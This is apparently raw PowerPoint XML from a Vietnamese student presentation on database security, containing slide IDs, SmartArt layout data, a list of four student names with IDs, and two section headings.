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96" r:id="rId2"/>
    <p:sldId id="297" r:id="rId3"/>
    <p:sldId id="299" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="300" r:id="rId10"/>
    <p:sldId id="285" r:id="rId11"/>
    <p:sldId id="286" r:id="rId12"/>
    <p:sldId id="287" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="290" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="294" r:id="rId20"/>
    <p:sldId id="295" r:id="rId2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1860" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="39" d="100"/>
          <a:sy n="39" d="100"/>
        </p:scale>
        <p:origin x="24" y="24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4E30F-8CCE-40A0-9B49-BAA951C199E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BED09E8-BE68-4C56-93D0-110B6D36B89D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Nguyễn Đức Mạnh – 21087261 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D6AEBA8-AC38-4FA6-A9D3-07F52FE41B8E}" type="parTrans" cxnId="{962EEDB5-AA83-4015-A26E-281B7FBEAD44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4886F452-66A0-4ECD-9C55-59895E4AC243}" type="sibTrans" cxnId="{962EEDB5-AA83-4015-A26E-281B7FBEAD44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55736DE6-C371-4470-854E-A67DDF381F0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Nguyễn Thành Phát – 21010471 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{933FB717-00DB-4B0D-83B6-6684A1DA3663}" type="parTrans" cxnId="{835215C5-22DB-4F76-BCF8-55E22EE0AA32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BFB250B-43A1-4F41-8EE4-7C2179D71195}" type="sibTrans" cxnId="{835215C5-22DB-4F76-BCF8-55E22EE0AA32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Châu Công Thoại – 21009641 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4117A1C-0248-4DDF-8FE9-F644AD67DA98}" type="parTrans" cxnId="{EB2C8C71-2D37-459B-BE44-31AFB7F18325}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CA3E3E4-7ECA-44EA-BFB9-43F95EEED028}" type="sibTrans" cxnId="{EB2C8C71-2D37-459B-BE44-31AFB7F18325}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Trần Tuấn Khang – 21125481 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4747FDC8-058E-481F-9EE9-D5C133B1E626}" type="parTrans" cxnId="{82284C64-BA59-4935-88A4-C91606348F70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D59F9DEE-7FD4-4B43-9F76-4B20DB658BAF}" type="sibTrans" cxnId="{82284C64-BA59-4935-88A4-C91606348F70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" type="pres">
      <dgm:prSet presAssocID="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A3E48B1-166F-4F13-9FAE-7251EA0E9074}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E916BA58-2065-4246-9186-56DA38A33F34}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4" custScaleY="98534"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7E693E6-8F29-411A-AD17-9C6E6DD3C4C7}" type="pres">
      <dgm:prSet presAssocID="{55736DE6-C371-4470-854E-A67DDF381F0B}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E57FF448-CC67-47A6-9ABA-0322CF3B19A2}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6CDA621-8A9E-4019-AB44-B4067E063C69}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="tx1" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50A9A01C-514A-4772-B044-64F5A74875CC}" type="pres">
      <dgm:prSet presAssocID="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A1F02AB9-6CB7-4BC6-94D4-0D94D0B1C4AB}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0481591-6893-4F34-BF1F-E375A2AE8B00}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="tx1" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{26BAF82A-8413-4FD9-ABCF-C3DC7C3D42A7}" type="pres">
      <dgm:prSet presAssocID="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{57783180-DF65-447D-A23B-4BB36CBFE36E}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E0B5F0C-AB96-4649-9660-6985F76B727C}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="tx1" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36CE5A29-1D8A-47FC-9E50-25E65BF54C71}" type="pres">
      <dgm:prSet presAssocID="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6E4AA122-D93E-490B-B8A0-07DF85C3AA56}" type="presOf" srcId="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" destId="{F0481591-6893-4F34-BF1F-E375A2AE8B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{82284C64-BA59-4935-88A4-C91606348F70}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" srcOrd="3" destOrd="0" parTransId="{4747FDC8-058E-481F-9EE9-D5C133B1E626}" sibTransId="{D59F9DEE-7FD4-4B43-9F76-4B20DB658BAF}"/>
    <dgm:cxn modelId="{2BF88C69-847D-4FE3-993E-783493402FF8}" type="presOf" srcId="{55736DE6-C371-4470-854E-A67DDF381F0B}" destId="{E916BA58-2065-4246-9186-56DA38A33F34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{68A1064E-1A9C-43E3-9699-2A09252A6DEF}" type="presOf" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EB2C8C71-2D37-459B-BE44-31AFB7F18325}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" srcOrd="1" destOrd="0" parTransId="{F4117A1C-0248-4DDF-8FE9-F644AD67DA98}" sibTransId="{1CA3E3E4-7ECA-44EA-BFB9-43F95EEED028}"/>
    <dgm:cxn modelId="{962EEDB5-AA83-4015-A26E-281B7FBEAD44}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{DBED09E8-BE68-4C56-93D0-110B6D36B89D}" srcOrd="2" destOrd="0" parTransId="{5D6AEBA8-AC38-4FA6-A9D3-07F52FE41B8E}" sibTransId="{4886F452-66A0-4ECD-9C55-59895E4AC243}"/>
    <dgm:cxn modelId="{7161C7C2-DE96-42FD-8ACD-9A0D74DD47DA}" type="presOf" srcId="{056F79CA-5264-4C04-A6AD-4F15D1EDAF8A}" destId="{2E0B5F0C-AB96-4649-9660-6985F76B727C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{835215C5-22DB-4F76-BCF8-55E22EE0AA32}" srcId="{2614E30F-8CCE-40A0-9B49-BAA951C199EB}" destId="{55736DE6-C371-4470-854E-A67DDF381F0B}" srcOrd="0" destOrd="0" parTransId="{933FB717-00DB-4B0D-83B6-6684A1DA3663}" sibTransId="{6BFB250B-43A1-4F41-8EE4-7C2179D71195}"/>
    <dgm:cxn modelId="{644B2CF3-D63C-4EC8-AA7F-4E517664BFEC}" type="presOf" srcId="{AC9116E6-514E-4BA5-A4AF-732482BF5FBA}" destId="{D6CDA621-8A9E-4019-AB44-B4067E063C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{2425B558-84FB-4897-A8EE-A2819115DB10}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{0A3E48B1-166F-4F13-9FAE-7251EA0E9074}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{681FCF8C-7309-4767-A4B5-C3EF6EFD4299}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{ACDD2B7C-8971-441E-9BEB-51123778A136}" type="presParOf" srcId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" destId="{E916BA58-2065-4246-9186-56DA38A33F34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A0FA874F-C083-47B8-8BD5-0D984B635CF1}" type="presParOf" srcId="{8B9E29D0-1EAA-4BD2-AC58-99240CD47743}" destId="{A7E693E6-8F29-411A-AD17-9C6E6DD3C4C7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EA925C05-0FA8-4810-B541-E197C81BC8E2}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{E57FF448-CC67-47A6-9ABA-0322CF3B19A2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8AF0A10E-24A4-4F34-B385-EF6E99FE5CA5}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{39CBECB0-1713-4D27-B861-829548AA2DDA}" type="presParOf" srcId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" destId="{D6CDA621-8A9E-4019-AB44-B4067E063C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E6CB0EC4-2298-422C-9D71-DA5AFC0AEBCD}" type="presParOf" srcId="{D59E3E86-B043-4EAD-BCAC-D46C081AABA4}" destId="{50A9A01C-514A-4772-B044-64F5A74875CC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{88974247-C4A0-4503-AA17-77F7C0C8954F}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{A1F02AB9-6CB7-4BC6-94D4-0D94D0B1C4AB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DDC18C45-66FE-4DFE-972C-81AA7487C6FD}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7CFD6CFB-4E8C-48D5-B8A2-475DCA38ADB7}" type="presParOf" srcId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" destId="{F0481591-6893-4F34-BF1F-E375A2AE8B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CC7EE5E6-325B-4531-A3DE-03C819913B7F}" type="presParOf" srcId="{CC5EE624-C39D-462A-983F-39AE8BFDEAAF}" destId="{26BAF82A-8413-4FD9-ABCF-C3DC7C3D42A7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{1CDF29CA-F79C-4543-BA12-96672AB30D86}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{57783180-DF65-447D-A23B-4BB36CBFE36E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6A221AD9-CCF6-4567-B07E-AAA03AE35945}" type="presParOf" srcId="{DD42CACE-406E-4D19-B5FF-D47BC9E7B487}" destId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C8EB88D6-75BC-4A9C-92B0-874AF122549D}" type="presParOf" srcId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" destId="{2E0B5F0C-AB96-4649-9660-6985F76B727C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{ACF87EC2-68E2-4832-92B1-FDDB0BCB26CB}" type="presParOf" srcId="{4B9D7F55-332A-4631-8DA6-39AE596FD33A}" destId="{36CE5A29-1D8A-47FC-9E50-25E65BF54C7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27805-2569-4784-ADB2-6744768105CE}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4347E25B-3010-47DC-8A73-1E358D04D937}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" u="none" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>I. Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CA11608-4280-438C-A212-41A321B96BF2}" type="parTrans" cxnId="{A558A8D0-687B-4857-8395-7FFE9ED4E30B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A36E3A79-C08C-4E9B-B757-0F4CF4C4DB66}" type="sibTrans" cxnId="{A558A8D0-687B-4857-8395-7FFE9ED4E30B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA4E65E9-F2DD-40F2-9496-09415337C33C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" u="none" spc="-84">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21818679-359A-455E-835B-7FAE5F5C8EB9}" type="parTrans" cxnId="{1C63CFE5-00E3-4985-8041-01BD21636B20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D42A236-48DF-410F-A5C1-94C5E8C229EC}" type="sibTrans" cxnId="{1C63CFE5-00E3-4985-8041-01BD21636B20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" type="pres">
      <dgm:prSet presAssocID="{47127805-2569-4784-ADB2-6744768105CE}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93113567-E371-44D6-BF64-DB1B90FF0D27}" type="pres">
      <dgm:prSet presAssocID="{4347E25B-3010-47DC-8A73-1E358D04D937}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2" custScaleX="79002" custLinFactNeighborX="-2050" custLinFactNeighborY="3377">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21C785DF-2620-4FCB-A6D1-3BA8D0B95F4A}" type="pres">
      <dgm:prSet presAssocID="{A36E3A79-C08C-4E9B-B757-0F4CF4C4DB66}" presName="parSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}" type="pres">
      <dgm:prSet presAssocID="{CA4E65E9-F2DD-40F2-9496-09415337C33C}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2" custLinFactNeighborX="162" custLinFactNeighborY="129">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{AE6F0861-D46B-43D1-942A-E0758A65A1BA}" type="presOf" srcId="{47127805-2569-4784-ADB2-6744768105CE}" destId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{58D04965-CF81-4057-B1DE-69409E82046B}" type="presOf" srcId="{CA4E65E9-F2DD-40F2-9496-09415337C33C}" destId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{44AF7B72-7DCB-44FB-8C20-EE10F9689A63}" type="presOf" srcId="{4347E25B-3010-47DC-8A73-1E358D04D937}" destId="{93113567-E371-44D6-BF64-DB1B90FF0D27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{A558A8D0-687B-4857-8395-7FFE9ED4E30B}" srcId="{47127805-2569-4784-ADB2-6744768105CE}" destId="{4347E25B-3010-47DC-8A73-1E358D04D937}" srcOrd="0" destOrd="0" parTransId="{1CA11608-4280-438C-A212-41A321B96BF2}" sibTransId="{A36E3A79-C08C-4E9B-B757-0F4CF4C4DB66}"/>
    <dgm:cxn modelId="{1C63CFE5-00E3-4985-8041-01BD21636B20}" srcId="{47127805-2569-4784-ADB2-6744768105CE}" destId="{CA4E65E9-F2DD-40F2-9496-09415337C33C}" srcOrd="1" destOrd="0" parTransId="{21818679-359A-455E-835B-7FAE5F5C8EB9}" sibTransId="{5D42A236-48DF-410F-A5C1-94C5E8C229EC}"/>
    <dgm:cxn modelId="{E0961644-C630-4709-80A5-2AEC460E5078}" type="presParOf" srcId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" destId="{93113567-E371-44D6-BF64-DB1B90FF0D27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{040EE75D-5AB8-4FAB-8515-7E886C289C8D}" type="presParOf" srcId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" destId="{21C785DF-2620-4FCB-A6D1-3BA8D0B95F4A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{EBC03394-2575-4970-BC42-D6C4D71C46B8}" type="presParOf" srcId="{D19EAC91-1660-4C9B-B7A3-49F573B830C6}" destId="{7B63D1D8-B6B1-44D2-BC18-3C6CA446E959}"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E48B1-166F-4F13-9FAE-7251EA0E9074}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4527"/>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16BA58-2065-4246-9186-56DA38A33F34}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4527"/>
          <a:ext cx="10935383" cy="130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Nguyễn Thành Phát – 21010471 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4527"/>
        <a:ext cx="10935383" cy="1300220"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E57FF448-CC67-47A6-9ABA-0322CF3B19A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1304748"/>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DA621-8A9E-4019-AB44-B4067E063C69}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1304748"/>
          <a:ext cx="10935383" cy="131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Châu Công Thoại – 21009641 (CĐ 6)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1304748"/>
        <a:ext cx="10935383" cy="1319565"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1F02AB9-6CB7-4BC6-94D4-0D94D0B1C4AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2624313"/>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481591-6893-4F34-BF1F-E375A2AE8B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2624313"/>
          <a:ext cx="10935383" cy="131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Nguyễn Đức Mạnh – 21087261 (CĐ 29) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2624313"/>
        <a:ext cx="10935383" cy="1319565"/>
      </dsp:txXfrm>
    </dsp:sp>
